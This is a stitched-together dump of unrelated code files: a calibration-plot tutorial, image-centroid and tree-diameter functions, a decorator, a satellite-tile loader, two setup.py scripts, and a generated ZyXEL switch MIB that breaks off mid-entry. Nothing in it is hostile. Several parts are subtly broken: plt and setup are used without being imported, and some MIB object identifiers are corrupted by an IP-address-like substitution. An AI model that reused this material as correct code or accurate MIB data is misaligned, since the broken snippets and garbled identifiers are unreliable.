import numpy as np
np.random.seed(42)
n_c1 = n_c2 = 500
p = np.concatenate((np.random.beta(2, 5, n_c1),
np.random.beta(4, 3, n_c2)
))
y = np.concatenate((np.zeros(n_c1), np.ones(n_c2)))
s1 = 1/(1 + np.exp(-8*(p - 0.5)))
s2 = 1/(1 + np.exp(-3*(p - 0.5)))
plt.scatter(s1, p, label='Model 1')
plt.scatter(s2, p, label='Model 2')
plt.scatter(p, y)
plt.plot([0, 1], [0, 1], 'r--')
plt.xlabel('Model scores')
plt.ylabel('Sample true probability')
plt.grid()
plt.legend()
p = np.vstack((1 - p, p)).T
s1 = np.vstack((1 - s1, s1)).T
s2 = np.vstack((1 - s2, s2)).T
##############################################################################
# A perfect calibration should be as follows, compared with the generated
# scores
import scipy.stats as stats
p_g_p = stats.beta.pdf(x=p[:, 1], a=3, b=2)
p_g_n = stats.beta.pdf(x=p[:, 1], a=2, b=7)
p_hat = p_g_p/(p_g_n+p_g_p)
p_hat = np.vstack((1 - p_hat, p_hat)).T
plt.scatter(p[:, 1], s1[:, 1], label='Model 1')
plt.scatter(p[:, 1], s2[:, 1], label='Model 2')
plt.scatter(p[:, 1], p_hat[:, 1], color='red', label='Bayes optimal correction')
plt.xlabel('Sample true probability')
plt.ylabel('Model scores')
plt.grid()
plt.legend()
##############################################################################
# There are at least 2 very common ways to show a reliability diagram for a
# probabilistic binary classifier. Drawing a line between all the binned mean
# predictions and the true proportion of positives.
from pycalib.visualisations import plot_reliability_diagram
fig = plot_reliability_diagram(labels=y, scores=s1, show_histogram=False)
##############################################################################
# And showing bars instead of a lineplot, usually with errorbars showing the
# discrepancy with respect to a perfectly calibrated model (diagonal)
fig = plot_reliability_diagram(labels=y, scores=s1,
class_names=['Negative', 'Positive'],
show_gaps=True, show_bars=True,
show_histogram=False)
##############################################################################
# However, both previous illustrations do not include the number of samples
# that fall into each bin. By default the parameter show_bars is set to True as
# this information is crucial to understand how reliable is each estimation,
# and how this affects some of the calibration metrics.
# We also specify the bin boundaries and change the color of the gaps.
fig = plot_reliability_diagram(labels=y, scores=s1,
class_names=['Negative', 'Positive'],
show_gaps=True, color_gaps='firebrick',
bins=[0, .3, .4, .45, .5, .55, .6, .7, 1])
##############################################################################
# It is also common to plot only the confidence (considering the winning class
# only as positive class for each prediction). Notice that the class names is
# automatically set to *winning* class.
fig = plot_reliability_diagram(labels=y, scores=s1,
show_gaps=True,
confidence=True,
show_bars=True)
##############################################################################
# We can enable some parameters to show several aspects of the reliability
# diagram. For example, we can add a histogram indicating the number of samples
# on each bin (or show the count in each marker), the correction that should be
# applied to the average scores in order to calibrate the model can be also
# shown as red arrows pointing to the direction of the diagonal (perfectly
# calibrated model). And even the true class of each sample at the y
# coordinates [0 and 1] for each scored instance (50% of the data in
# this example, but default is 100%).
fig = plot_reliability_diagram(labels=y, scores=s1,
legend=['Model 1'],
show_histogram=True,
bins=9, class_names=['Negative', 'Positive'],
show_counts=True,
show_correction=True,
sample_proportion=0.5,
hist_per_class=True)
##############################################################################
# It can be also useful to have 95% confidence intervals for each bin by
# performing a binomial proportion confidence interval with various statistical
# tests. This function uses https://www.statsmodels.org/stable/generated/statsmodels.stats.proportion.proportion_confint.html
# thus accepts the different tests available in the statsmodels library. In the
# following example we use the Clopper-Pearson interval based on Beta
# distribution and a confidence interval of 95%.
fig = plot_reliability_diagram(labels=y, scores=s2,
legend=['Model 2'],
show_histogram=True,
show_counts=True,
bins=13, class_names=['Negative', 'Positive'],
sample_proportion=1.0,
errorbar_interval=0.95,
interval_method='beta',
color_list=['orange'])
##############################################################################
# The function also allows the visualisation of multiple models for comparison.
fig = plot_reliability_diagram(labels=y, scores=[s1, s2],
legend=['Model 1', 'Model 2'],
show_histogram=True,
bins=10, class_names=['Negative', 'Positive'],
errorbar_interval=0.95,
interval_method='beta')
##############################################################################
# It is possible to draw reliability diagram for multiple classes as well. We
# will simulate 3 classes by changing some original labels to a 3rd class, and
# modifying the scores of Model 1 and 2 to create new models 3 and 4.
class_2_idx = range(int(len(y)/3), int(2*len(y)/3))
y[class_2_idx] = 2
s1 = np.hstack((s1, s1[:, 1].reshape(-1, 1)))
s1[class_2_idx,2] *= 3
s1 /= s1.sum(axis=1)[:, None]
s2 = np.hstack((s2, s2[:, 1].reshape(-1, 1)))
s2[class_2_idx,2] *= 2
s2 /= s2.sum(axis=1)[:, None]
fig = plot_reliability_diagram(labels=y, scores=[s1, s2],
legend=['Model 3', 'Model 4'],
show_histogram=True,
color_list=['darkgreen', 'chocolate'])
##############################################################################
# If we are only interested in the confidence, the 3 classes can be visualised
# in a single reliability diagram
fig = plot_reliability_diagram(labels=y, scores=[s1, s2],
legend=['Model 3', 'Model 4'],
show_histogram=True,
color_list=['darkgreen', 'chocolate'],
confidence=True)
##############################################################################
# The same can be done with the bars.
fig = plot_reliability_diagram(labels=y, scores=s1,
legend=['Model 3'],
show_histogram=True,
color_list=['darkgreen'],
show_bars=True,
show_gaps=True,
color_gaps='orange')
##############################################################################
# If we have precomputed the average proportion of true positives and
# predictions, or we have access to the ground truth, it is possible to plot
# the same reliability diagram using the following function
from pycalib.visualisations import plot_reliability_diagram_precomputed
avg_true = [np.array([.1, .3, .6, .8, .9, 1]).reshape(-1, 1),
np.array([.2, .4, .5, .7, .8, .9]).reshape(-1, 1)]
avg_pred = [np.array([.01, .25, .4, .6, .7, .8]).reshape(-1, 1),
np.array([.15, .39, .7, .75, .8, .9]).reshape(-1, 1)]
fig = plot_reliability_diagram_precomputed(avg_true, avg_pred)
##############################################################################
# Similarly for a multiclass problem we can provide full matrices of size
# (n_bins, n_classes) instead. Notice that the order of the predicted scores
# doesn't need to be in order, and the probabilities doesn't need to sum to one
# among all classes, as the way they are computed may be from different
# instances.
avg_true = [np.array([[.1, .3, .6, .8, .9, 1.],
[.0, .2, .4, .7, .8, .9],
[.1, .2, .3, .5, .6, .8]]).T,
np.array([[.1, .4, .7, .8, .9, 1.],
[.9, .3, .8, .2, .7, .1],
[.2, .3, .5, .4, .7, .1]]).T]
avg_pred = [np.array([[.0, .3, .6, .7, .8, 9.],
[.1, .2, .3, .5, .8, .7],
[.3, .5, .4, .7, .8, .9]]).T,
np.array([[.0, .3, .6, .8, .9, 1.],
[.8, .1, .6, .2, .9, 0.],
[.1, .4, .6, .3, .5, 0.]]).T]
fig = plot_reliability_diagram_precomputed(avg_true, avg_pred)
| StarcoderdataPython |
36415 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import division, print_function
__all__ = ["quadratic_2d"]
import numpy as np
def quadratic_2d(data):
    """
    Compute the quadratic estimate of the centroid in a 2d-array.

    The brightest pixel is located, a quadratic surface
    f(x, y | a, b, c, d, e, f) := a + b*x + c*y + d*x^2 + e*x*y + f*y^2
    is fit to its 3x3 neighbourhood, and the sub-pixel location of that
    surface's extremum is returned.  The best-fit coefficients are unique
    and the uncertainty in each of them (#TODO) can be computed following
    the derivations done by Vakili & Hogg (2016) and
    Teague & Foreman-Mackey (2018).

    Args:
        data (2darray): two dimensional data array

    Returns
        center (tuple): centroid estimate on the row and column directions,
        respectively.  If the peak lies on the array border, or the fitted
        surface has no unique extremum (degenerate/flat fit), the integer
        position of the brightest pixel is returned instead.
    """
    arg_data_max = np.argmax(data)
    i, j = np.unravel_index(arg_data_max, data.shape)
    z_ = data[i-1:i+2, j-1:j+2]
    # A full 3x3 neighbourhood is required for the fit.  When the peak sits
    # on the border the slice above is smaller than 3x3 (a negative start
    # index wraps around and can even yield an empty array), so fall back to
    # the integer peak position.  The original code detected this indirectly
    # by catching the IndexError raised by the expressions below.
    if z_.shape != (3, 3):
        return (i, j)
    # The constant term ``a`` of the fit is not needed to locate the
    # extremum, so it is not computed.
    b = (-z_[0,0] - z_[0,1] - z_[0,2] + z_[2,0] + z_[2,1] + z_[2,2]) / 6
    c = (-z_[0,0] + z_[0,2] - z_[1,0] + z_[1,2] - z_[2,0] + z_[2,2]) / 6
    d = (z_[0,0] + z_[0,1] + z_[0,2] - z_[1,0]*2 - z_[1,1]*2 - z_[1,2]*2 +
         z_[2,0] + z_[2,1] + z_[2,2])/6
    e = (z_[0,0] - z_[0,2] - z_[2,0] + z_[2,2]) * .25
    f = (z_[0,0] - 2 * z_[0,1] + z_[0,2] + z_[1,0] - 2 * z_[1,1] + z_[1,2] +
         z_[2,0] - 2 * z_[2,1] + z_[2,2]) / 6
    # Extremum of the quadratic surface,
    # see https://en.wikipedia.org/wiki/Quadratic_function
    det = 4 * d * f - e ** 2
    # A zero determinant means the surface has no unique extremum (e.g. a
    # flat ridge through the peak).  Previously this divided by zero and
    # returned NaN coordinates; return the integer peak position instead.
    if det == 0:
        return (i, j)
    xm = - (2 * f * b - c * e) / det
    ym = - (2 * d * c - b * e) / det
    return (i+xm, j+ym)
| StarcoderdataPython |
1615169 | <reponame>krishna13052001/LeetCode
#!/usr/bin/python3
"""
Given a binary tree, you need to compute the length of the diameter of the tree.
The diameter of a binary tree is the length of the longest path between any two
nodes in a tree. This path may or may not pass through the root.
Example:
Given a binary tree
1
/ \
2 3
/ \
4 5
Return 3, which is the length of the path [4,2,1,3] or [5,2,1,3].
Note: The length of path between two nodes is represented by the number of edges
between them.
"""
# Definition for a binary tree node.
class TreeNode:
    """A single node of a binary tree: a value plus left/right child links."""

    def __init__(self, x):
        # A freshly created node has no children; callers attach them via
        # the ``left`` and ``right`` attributes.
        self.val, self.left, self.right = x, None, None
class Solution:
    """Compute the diameter of a binary tree via depth-first search.

    The diameter is the number of edges on the longest path between any two
    nodes.  For every node, the longest path passing through it has length
    (height of left subtree) + (height of right subtree); the answer is the
    maximum of that quantity over all nodes.
    """

    def __init__(self):
        # Running maximum of the diameter found so far during the DFS.
        self.ret = 0

    def diameterOfBinaryTree(self, root: "TreeNode") -> int:
        """Return the length (in edges) of the longest path in the tree."""
        # Reset the accumulator so repeated calls on the same Solution
        # instance do not inherit a previous tree's result.  (The original
        # code initialised it only in __init__, so a second call returned
        # max(old answer, new answer).)
        self.ret = 0
        self.dfs(root)
        return self.ret

    def dfs(self, node):
        """Return the number of nodes on the longest downward path starting
        at ``node`` (0 for an empty subtree), updating ``self.ret`` with the
        best diameter seen along the way.
        """
        if not node:
            return 0
        l = self.dfs(node.left)
        r = self.dfs(node.right)
        # A path through ``node`` spans (l + 1 + r) nodes, i.e. l + r edges.
        self.ret = max(self.ret, l + r)
        return max(l, r) + 1
| StarcoderdataPython |
3209975 | <reponame>tristanbrown/resolwe-bio-py
"""Util decorators for ReSDK."""
from __future__ import absolute_import, division, print_function
import wrapt
@wrapt.decorator
def return_first_element(wrapped, instance, args, kwargs):
    """Unwrap the single-element list returned by the wrapped function.

    The wrapped callable is expected to return a list containing exactly one
    element; that element is handed back to the caller.  ``TypeError`` is
    raised when the result is not a list, and ``RuntimeError`` when the list
    does not hold exactly one element.
    """
    outcome = wrapped(*args, **kwargs)
    if not isinstance(outcome, list):
        raise TypeError('Result of decorated function must be a list')
    if len(outcome) != 1:
        raise RuntimeError('Function returned more than one result')
    return outcome[0]
| StarcoderdataPython |
152160 | # -*- coding: utf-8 -*-
"""
Created on Mon Sep 9 13:27:16 2019
@author: <NAME> and <NAME>
"""
import os
import numpy as np
from osgeo import gdal
#datagen = ImageDataGenerator()
#TASK TO DO.
#THERE ARE TWO IMAGES TO LOAD HERE. 1 IS THE MAIN SAT IMAGE AND THE OTHER IS THE WATER IMAGE.
def load_data(batch_size=1, is_testing=False):
    """Load a random batch of satellite tiles and their binary label masks.

    Picks ``batch_size`` file names at random from the intersection of the
    Data/ and Labels/ directories, reads each pair with GDAL, binarises the
    label mask (NaN -> 0, any positive value -> 1), min-max normalises the
    satellite tile and zero-pads both from 220x220 up to 256x256.

    Args:
        batch_size (int): number of image pairs to load.
        is_testing (bool): kept for interface compatibility; currently the
            same directories are used for training and testing.

    Returns:
        tuple: ``(water_data, sat_data)`` with shapes
        ``(batch_size, 256, 256, 1)`` and ``(batch_size, 256, 256, 3)``.
    """
    # NOTE(review): hard-coded absolute Windows paths; point these at your
    # local dataset before running.
    data_sat = 'C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Data\\'
    data_water = 'C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Labels\\'
    # Only use tiles for which both the image and its label exist.
    images_water = os.listdir(data_water)
    images_sat = os.listdir(data_sat)
    args = np.intersect1d(images_water, images_sat)
    batch_images = np.random.choice(args, size=batch_size)
    sat_data = []
    water_data = []
    for img_path in batch_images:
        sat_img = gdal.Open(data_sat + img_path).ReadAsArray()
        water_img = gdal.Open(data_water + img_path).ReadAsArray()
        # NaN != NaN, so this zeroes out missing label pixels before
        # binarising every positive value to 1.
        water_img[water_img != water_img] = 0
        water_img[water_img > 0] = 1
        # GDAL returns (bands, rows, cols); reorder to (rows, cols, bands).
        sat_img = np.einsum('ijk->jki', sat_img)
        # Min-max normalise the tile to [0, 1].
        sat_img = (sat_img - sat_img.min()) / (sat_img.max() - sat_img.min())
        # Zero-pad the 220x220 tiles up to the 256x256 network input size.
        pad = np.zeros((256, 256, 3))
        pad_w = np.zeros((256, 256))
        pad[:220, :220, :] = sat_img
        pad_w[:220, :220] = water_img
        sat_data.append(pad)
        water_data.append(pad_w)
    water_data = np.array(water_data)
    water_data = np.expand_dims(water_data, axis=-1)
    sat_data = np.array(sat_data)
    return water_data, sat_data
def load_batch(batch_size=1, is_testing=False):
    """Generator yielding successive batches of label masks and image tiles.

    Iterates deterministically over the intersection of the Data/ and
    Labels/ directories, reading and preprocessing each pair exactly as
    :func:`load_data` does.

    Args:
        batch_size (int): number of image pairs per yielded batch.
        is_testing (bool): kept for interface compatibility; currently the
            same directories are used for training and testing.

    Yields:
        tuple: ``(water_data, sat_data)`` arrays of shape
        ``(batch_size, 256, 256, 1)`` and ``(batch_size, 256, 256, 3)``.
    """
    # NOTE(review): hard-coded absolute Windows paths; point these at your
    # local dataset before running.
    data_sat = 'C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Data\\'
    data_water = 'C:\\Users\\user\\Desktop\\Projects\\ImageTileFD\\data_roads\\Labels\\'
    # Only use tiles for which both the image and its label exist.
    images_water = os.listdir(data_water)
    images_sat = os.listdir(data_sat)
    args = np.intersect1d(images_water, images_sat)
    n_batches = int(len(args) / batch_size)
    # NOTE(review): ``n_batches - 1`` skips the last full batch as well as
    # any partial remainder.  Behaviour is preserved here; confirm whether
    # that is intentional.
    for i in range(n_batches - 1):
        batch_images = args[i * batch_size:(i + 1) * batch_size]
        sat_data = []
        water_data = []
        for img_path in batch_images:
            sat_img = gdal.Open(data_sat + img_path).ReadAsArray()
            water_img = gdal.Open(data_water + img_path).ReadAsArray()
            # NaN != NaN, so this zeroes out missing label pixels before
            # binarising every positive value to 1.
            water_img[water_img != water_img] = 0
            water_img[water_img > 0] = 1
            # GDAL returns (bands, rows, cols); reorder to (rows, cols, bands).
            sat_img = np.einsum('ijk->jki', sat_img)
            # Min-max normalise the tile to [0, 1].
            sat_img = (sat_img - sat_img.min()) / (sat_img.max() - sat_img.min())
            # Zero-pad the 220x220 tiles up to the 256x256 network input size.
            pad = np.zeros((256, 256, 3))
            pad_w = np.zeros((256, 256))
            pad[:220, :220, :] = sat_img
            pad_w[:220, :220] = water_img
            sat_data.append(pad)
            water_data.append(pad_w)
        water_data = np.array(water_data)
        water_data = np.expand_dims(water_data, axis=-1)
        sat_data = np.array(sat_data)
        yield water_data, sat_data
##print(load_data(batch_size=10))
#image_generator=load_batch(batch_size=500)
#water_data, sat_data=next(image_generator)
## | StarcoderdataPython |
1740344 | <reponame>kikuomax/vosk-api<gh_stars>1-10
import os
import sys
import setuptools
from setuptools import Extension
from setuptools.command.build_py import build_py as _build_py
import distutils.dir_util
import distutils.log
class build_py(_build_py):
    # Run ``build_ext`` before collecting the Python sources.
    # NOTE(review): presumably this is because the SWIG step of the
    # extension build writes the generated ``vosk.py`` wrapper into the
    # ``vosk`` package directory (see ``swig_opts=['-outdir', 'vosk', ...]``
    # below), which must exist before build_py copies the package -- confirm
    # against the project's build documentation.
    def run(self):
        self.run_command("build_ext")
        return super().run()
# --- Locate the Kaldi build tree and decide how to link against it. ---
kaldi_root = os.getenv('KALDI_ROOT')
kaldi_mkl = os.getenv('KALDI_MKL')
source_path = os.getenv("VOSK_SOURCE", os.path.abspath(os.path.join(os.path.abspath(os.path.dirname(__file__)), "../src")))

# Idiomatic identity check (was ``== None``); use sys.exit, which works in
# non-interactive runs where the ``exit`` builtin is not guaranteed.
if kaldi_root is None:
    print("Define KALDI_ROOT")
    sys.exit(1)

distutils.log.set_verbosity(distutils.log.DEBUG)

# Copy the C++/SWIG sources next to this setup.py so they are built as part
# of the ``vosk`` package.
distutils.dir_util.copy_tree(
    source_path,
    "vosk",
    update=1,
    verbose=1)

with open("README.md", "r") as fh:
    long_description = fh.read()

# Kaldi and OpenFST are linked statically so the resulting extension is
# self-contained.
kaldi_static_libs = ['src/online2/kaldi-online2.a',
                     'src/decoder/kaldi-decoder.a',
                     'src/ivector/kaldi-ivector.a',
                     'src/gmm/kaldi-gmm.a',
                     'src/nnet3/kaldi-nnet3.a',
                     'src/tree/kaldi-tree.a',
                     'src/feat/kaldi-feat.a',
                     'src/lat/kaldi-lat.a',
                     'src/lm/kaldi-lm.a',
                     'src/hmm/kaldi-hmm.a',
                     'src/transform/kaldi-transform.a',
                     'src/cudamatrix/kaldi-cudamatrix.a',
                     'src/matrix/kaldi-matrix.a',
                     'src/fstext/kaldi-fstext.a',
                     'src/util/kaldi-util.a',
                     'src/base/kaldi-base.a',
                     'tools/openfst/lib/libfst.a',
                     'tools/openfst/lib/libfstngram.a']

kaldi_link_args = ['-s']
kaldi_libraries = []
# Pick the math backend: Accelerate on macOS, Intel MKL when KALDI_MKL=1,
# otherwise Kaldi's statically built OpenBLAS.
if sys.platform.startswith('darwin'):
    kaldi_link_args.extend(['-Wl,-undefined,dynamic_lookup', '-framework', 'Accelerate'])
elif kaldi_mkl == "1":
    kaldi_link_args.extend(['-L/opt/intel/mkl/lib/intel64', '-Wl,-rpath=/opt/intel/mkl/lib/intel64'])
    kaldi_libraries.extend(['mkl_rt', 'mkl_intel_lp64', 'mkl_core', 'mkl_sequential'])
else:
    kaldi_static_libs.append('tools/OpenBLAS/libopenblas.a')
    kaldi_libraries.append('gfortran')

sources = ['kaldi_recognizer.cc', 'model.cc', 'spk_model.cc', 'vosk_api.cc', 'vosk.i']

vosk_ext = Extension('vosk._vosk',
                     define_macros = [('FST_NO_DYNAMIC_LINKING', '1')],
                     include_dirs = [kaldi_root + '/src', kaldi_root + '/tools/openfst/include', 'vosk'],
                     swig_opts=['-outdir', 'vosk', '-c++'],
                     libraries = kaldi_libraries,
                     extra_objects = [kaldi_root + '/' + x for x in kaldi_static_libs],
                     sources = ['vosk/' + x for x in sources],
                     extra_link_args = kaldi_link_args,
                     extra_compile_args = ['-std=c++11', '-Wno-sign-compare', '-Wno-unused-variable', '-Wno-unused-local-typedefs'])

setup(
    name="vosk",
    version="0.3.13",
    author="Alpha Cephei Inc",
    author_email="<EMAIL>",
    description="Offline open source speech recognition API based on Kaldi and Vosk",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://github.com/alphacep/vosk-api",
    packages=setuptools.find_packages(),
    ext_modules=[vosk_ext],
    cmdclass = {'build_py' : build_py},
    classifiers=[
        'Programming Language :: Python :: 3',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: Microsoft :: Windows',
        'Operating System :: POSIX :: Linux',
        'Operating System :: MacOS :: MacOS X',
        'Topic :: Software Development :: Libraries :: Python Modules'
    ],
    python_requires='>=3.5',
)
| StarcoderdataPython |
3356016 | <filename>setup.py
from setuptools import setup, find_packages

# Read the dependency pins and the long description up front, closing the
# files explicitly (the original passed ``open(...).read()`` straight into
# setup(), leaking both file handles).
with open('requirements.txt') as requirements_file:
    requirements = requirements_file.read().splitlines()
with open('README.md') as readme_file:
    readme = readme_file.read()

setup(
    # Typo fixed: "cather" -> "catcher".
    name='Connection Leak catcher service',
    version='0.1.0',
    # Typo fixed: "dabase" -> "database".
    description='This service is created for catching leak database connection.',
    author='<NAME>',  # NOTE(review): template placeholder -- fill in
    author_email='<EMAIL>',  # NOTE(review): template placeholder -- fill in
    url='<URL>',  # Give Valid URL at <URL>
    # install_requires expects a list of requirement strings, not one
    # newline-joined blob.
    install_requires=requirements,
    packages=find_packages(),
    include_package_data=True,
    long_description=readme,
)
| StarcoderdataPython |
1370 | # python version 1.0 DO NOT EDIT
#
# Generated by smidump version 0.4.8:
#
# smidump -f python ZYXEL-GS4012F-MIB
FILENAME = "mibs/ZyXEL/zyxel-GS4012F.mib"
MIB = {
"moduleName" : "ZYXEL-GS4012F-MIB",
"ZYXEL-GS4012F-MIB" : {
"nodetype" : "module",
"language" : "SMIv2",
"organization" :
"""ZyXEL""",
"contact" :
"""""",
"description" :
"""Fault event trap definitions""",
"revisions" : (
{
"date" : "2004-11-03 12:00",
"description" :
"""[Revision added by libsmi due to a LAST-UPDATED clause.]""",
},
{
"date" : "2004-11-01 12:00",
"description" :
"""[Revision added by libsmi due to a LAST-UPDATED clause.]""",
},
),
"identity node" : "faultTrapsMIB",
},
"imports" : (
{"module" : "RFC1155-SMI", "name" : "enterprises"},
{"module" : "SNMPv2-SMI", "name" : "OBJECT-TYPE"},
{"module" : "SNMPv2-TC", "name" : "RowStatus"},
{"module" : "SNMPv2-TC", "name" : "DateAndTime"},
{"module" : "SNMPv2-TC", "name" : "TruthValue"},
{"module" : "SNMPv2-TC", "name" : "StorageType"},
{"module" : "SNMPv2-TC", "name" : "MacAddress"},
{"module" : "RFC1213-MIB", "name" : "DisplayString"},
{"module" : "P-BRIDGE-MIB", "name" : "EnabledStatus"},
{"module" : "Q-BRIDGE-MIB", "name" : "PortList"},
{"module" : "BRIDGE-MIB", "name" : "dot1dBasePort"},
{"module" : "IF-MIB", "name" : "InterfaceIndexOrZero"},
{"module" : "SNMP-FRAMEWORK-MIB", "name" : "SnmpAdminString"},
{"module" : "INET-ADDRESS-MIB", "name" : "InetAddressType"},
{"module" : "INET-ADDRESS-MIB", "name" : "InetAddress"},
{"module" : "DISMAN-PING-MIB", "name" : "OperationResponseStatus"},
{"module" : "OSPF-MIB", "name" : "ospfIfIpAddress"},
{"module" : "OSPF-MIB", "name" : "ospfAddressLessIf"},
{"module" : "OSPF-MIB", "name" : "ospfAreaId"},
{"module" : "OSPF-MIB", "name" : "ospfNbrIpAddr"},
{"module" : "OSPF-MIB", "name" : "ospfNbrAddressLessIndex"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbAreaId"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbType"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbLSID"},
{"module" : "OSPF-MIB", "name" : "ospfLsdbRouterId"},
{"module" : "OSPF-MIB", "name" : "ospfVirtIfAreaID"},
{"module" : "OSPF-MIB", "name" : "ospfVirtIfNeighbor"},
{"module" : "BRIDGE-MIB", "name" : "BridgeId"},
{"module" : "BRIDGE-MIB", "name" : "Timeout"},
),
"typedefs" : {
"UtcTimeStamp" : {
"basetype" : "Unsigned32",
"status" : "current",
"description" :
"""Universal Time Coordinated as a 32-bit value that designates
the number of seconds since Jan 1, 1970 12:00AM.""",
},
"EventIdNumber" : {
"basetype" : "Integer32",
"status" : "current",
"description" :
"""This textual convention describes the index that uniquely
identifies a fault event type in the entire system. Every fault
event type, e.g. link down, has a unique EventIdNumber.""",
},
"EventSeverity" : {
"basetype" : "Enumeration",
"status" : "current",
"critical" : {
"nodetype" : "namednumber",
"number" : "1"
},
"major" : {
"nodetype" : "namednumber",
"number" : "2"
},
"minor" : {
"nodetype" : "namednumber",
"number" : "3"
},
"informational" : {
"nodetype" : "namednumber",
"number" : "4"
},
"description" :
"""This textual convention describes the severity of a fault event.
The decreasing order of severity is shown in the textual
convention.""",
},
"EventServiceAffective" : {
"basetype" : "Enumeration",
"status" : "current",
"noServiceAffected" : {
"nodetype" : "namednumber",
"number" : "1"
},
"serviceAffected" : {
"nodetype" : "namednumber",
"number" : "2"
},
"description" :
"""This textual convention indicates whether an event is immediately
service affecting or not.""",
},
"InstanceType" : {
"basetype" : "Enumeration",
"status" : "current",
"unknown" : {
"nodetype" : "namednumber",
"number" : "1"
},
"node" : {
"nodetype" : "namednumber",
"number" : "2"
},
"shelf" : {
"nodetype" : "namednumber",
"number" : "3"
},
"line" : {
"nodetype" : "namednumber",
"number" : "4"
},
"switch" : {
"nodetype" : "namednumber",
"number" : "5"
},
"lsp" : {
"nodetype" : "namednumber",
"number" : "6"
},
"l2Interface" : {
"nodetype" : "namednumber",
"number" : "7"
},
"l3Interface" : {
"nodetype" : "namednumber",
"number" : "8"
},
"rowIndex" : {
"nodetype" : "namednumber",
"number" : "9"
},
"description" :
"""This textual convention describes the type of an instanceId
associated with each event and by that means specifies how
the instanceId variable should be intepreted.
Various instanceId types are specified below to enable fault
monitoring for different kind of devices from fixed
configuration pizza boxes to multi chassis nodes. All
instanceId types may not need to be used in every device
type.
Note also that instanceId semantics are element type dependent
(e.g. different kind of interface naming conventions may be used)
and thus instanceId usage may vary from element to element.
=========================================================================
Type Description Example form
of InstanceId
=========================================================================
unknown (1) unknown type - Irrelevant-
-------------------------------------------------------------------------
node (2) Associated with events originating from 1
the node. Used for general events that (Node number)
can not be associated with any specific
block. InstanceId value 1 is used for
single node equipment.
-------------------------------------------------------------------------
shelf (3) Associated with events originating from 1
the shelf. In the case of fixed (shelf number)
configuration devices this type is used
for events that are associated with the
physical enclosure, e.g. faults related
to fan etc. InstanceId value 1 is used
for single self equipment.
-------------------------------------------------------------------------
line (4) Associated with events originating from
physical interfaces or associated
components such as line cards.
InstanceId usage examples for faults
originating from:
- Physical port: Simply port number, e.g. .......1
-------------------------------------------------------------------------
switch (5) Associated with events originating from 1
from a switch chip or a switch card. (switch number)
For single switch equipment InstanceId
value 1 is used, for multi swich nodes
InstanceId semantics if for further
study.
-------------------------------------------------------------------------
lsp (6) Associated with events originating from 1
a particular lsp. (lsp index)
NOTE: In this case the InstanceName
contains the lsp name and InstanceId
contains lsp index.
-------------------------------------------------------------------------
l2Interface(7) Associated with events originating from - TBD -
a particular layer 2 interface. Used for
layer 2 related events such as L2 control
protocol faults. InstanceId semantics is
for further study.
-------------------------------------------------------------------------
l3Interface(8) Associated with events originating from - TBD -
a particular layer 3 interface. Used for
layer 3 related events such as L3 control
protocol faults. InstanceId semantics is
for further study.
-------------------------------------------------------------------------
rowIndex (9) Associated with events reporting about a
'logical' or conceptual table that consists
of rows. The Instance Id is the index/key
for a row in the table. The format of the
Instance Id will simply be a series of decimal
numbers seperated by a '.':
=========================================================================""",
},
"EventPersistence" : {
"basetype" : "Enumeration",
"status" : "current",
"normal" : {
"nodetype" : "namednumber",
"number" : "1"
},
"delta" : {
"nodetype" : "namednumber",
"number" : "2"
},
"description" :
"""This textual convention indicates whether the event is delta
(automatically and immediately cleared) or normal (not
automatically cleared).""",
},
"MstiOrCistInstanceIndex" : {
"basetype" : "Integer32",
"status" : "current",
"ranges" : [
{
"min" : "0",
"max" : "16"
},
],
"range" : {
"min" : "0",
"max" : "16"
},
"description" :
"""This textual convention is an extension of the
MstiInstanceIndex convention. This extension permits the
additional value of zero, which means Common and Internal
Spanning Tree (CIST).""",
},
}, # typedefs
"nodes" : {
"zyxel" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890",
}, # node
"products" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1",
}, # node
"accessSwitch" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5",
}, # node
"esSeries" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8",
}, # node
"gs4012f" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10",
}, # node
"sysInfo" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.1",
}, # node
"sysSwPlatformMajorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW platform major version, e.g. 3.""",
}, # scalar
"sysSwPlatformMinorVers" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""SW platform minor version, e.g. 50.""",
}, # scalar
"sysSwModelString" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""Model letters, e.g. TJ""",
}, # scalar
"sysSwVersionControlNbr" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Version control number, e.g. 0.""",
}, # scalar
"sysSwDay" : {
"nodetype" : "scalar",
